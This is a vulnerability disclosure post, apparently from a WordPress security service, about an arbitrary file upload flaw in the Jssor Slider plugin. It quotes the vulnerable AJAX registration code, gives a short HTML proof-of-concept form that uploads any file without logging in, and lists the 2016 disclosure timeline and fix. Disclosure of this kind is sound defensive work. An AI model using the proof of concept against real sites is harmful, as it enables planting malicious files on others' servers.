Recently we have been finding a lot of vulnerabilities in WordPress plugins through monitoring our websites for what look to be requests related to hacking attempts. That has lead to these plugins either being fixed or pulled from the Plugin Directory so that more websites are not made vulnerable. Us getting the plugin removed from the Plugin Directory obviously doesn’t do anything for people already running it, so WordPress should final take up our suggestion to warn about the fact the they removed a plugin for a security issue. In the meantime even if you don’t use our service you can get warned about plugins like this with our Plugin Vulnerabilities plugin, since even without being signed up for the service you get warned about vulnerabilities in plugins we are seeing hacking attempts against.

We are always looking for ways we can improve our data collection so that we can provide our customers with the best data possible. To that end we are looking at ways we can gather more data like the kind that allowed us to catch those new vulnerabilities. In working on that we came across another vulnerability, one that indicates that others have not been doing this work.

There are number of websites that report on hacking  attempts and in looking at one of those, abuseipdb.com, we came across a report of a request for the file /wp-content/plugins/jssor-slider/assets/css/jssor-slider.css as part of an attack in May of last year. That file is part of the plugin Jssor Slider.

That plugin has a file upload capability and since exploration of vulnerabilities in that is probably a hacker’s number one target when trying to hacker websites, we first went to check on that found that it allowed the upload of arbitrary files.

When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run:

239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259

public function register_ajax_calls() {
 
	if ( isset( $_REQUEST['action'] ) ) {
		switch ( $_REQUEST['action'] ) {
			case 'add_new_slider_library' :
				add_action( 'admin_init', 'jssor_slider_library' );
				function jssor_slider_library() {
 
					include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
				}
				break;
			case 'upload_library' :
				add_action( 'admin_init', 'upload_library' );
				function upload_library() {
 
					include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
				}
				break;
		}
	}	
}

That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded.

Considering how easy it was for us to find the vulnerability it certainly looks like we were the first people other than the hacker to check on the plugin.

It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• 6/20/2016 – Developer notified.
• 6/24/2016 – WordPress.org Plugin Directory notified.
• 6/28/2016 – Removed from Plugin Directory.
• 7/1/2016 – Version 1.4 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?